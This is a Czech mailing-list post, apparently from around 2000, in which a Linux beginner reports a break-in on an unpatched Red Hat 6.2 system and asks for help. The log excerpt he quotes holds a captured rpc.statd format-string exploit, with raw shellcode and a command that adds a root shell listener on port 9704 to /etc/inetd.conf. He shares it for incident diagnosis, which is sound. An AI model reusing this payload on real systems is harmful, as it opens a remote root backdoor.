utok

[Radek Kohout]

Preji prijemny den.
Tak se mi kdosi naboural do systemu.
Redhat 6.2 z computer Pressu bez jakychkoliv oprav
jadro 2.2.14 -6.0.1
Vysek z /var/log/messages
********************
Nov 19 23:04:32 kohout xntpd[9991]: kernel pll status change 89
Nov 19 23:51:47 kohout rpc.statd[333]: SM_MON request for hostname containing '/': ^D÷˙ż^D÷˙ż^E÷˙ż^E÷˙ż^F÷˙ż^F÷˙ż^G÷˙ż^G÷˙ż08049f10 bffff754 000028f8 4d5f4d53 72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63 696e6961 2720676e 203a272f 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000bffff70400000000000000000000000000000000000000000000000bffff7050000bffff7060000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000bffff707ëK^?v?ƒî Ť^(ƒĆ ?^°ƒî Ť^.ƒĆ ƒĂ ƒë#?^´1Ŕƒî ˆF'ˆF*ƒĆ ˆF??F¸°+, ?óŤN?ŤV¸Í€1Ű?Ř@̀č°˙˙˙/bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
Nov 20 04:02:01 kohout anacron[3470]: Updated timestamp for job `cron.daily' to 2000-11-20
Nov 20 06:09:03 kohout xntpd[9991]: kernel pll status change 89
*******************
Pochopil jsem dobre, ze nato sli pres rpc? co mam zastavit?
Proc zustal v /etc/inetd.conf pouze jeden radek,
*****
9704 stream tcp nowait root /bin/sh sh -i
*****
 kdyz chteli tento radek pridat ( >> )

Co tim dosahli?
Existuje nekde na Inetu server, ktery by prohledal bezpecnostni diry? 
(jiny nez nessus)
Prosim zkusenejsi o radu.

V zabezpeceni linuxu jsem zacatecnik
predem dekuji

Radek Kohout
Radek.Kohout na op-profashion.cz
0508/ 311 705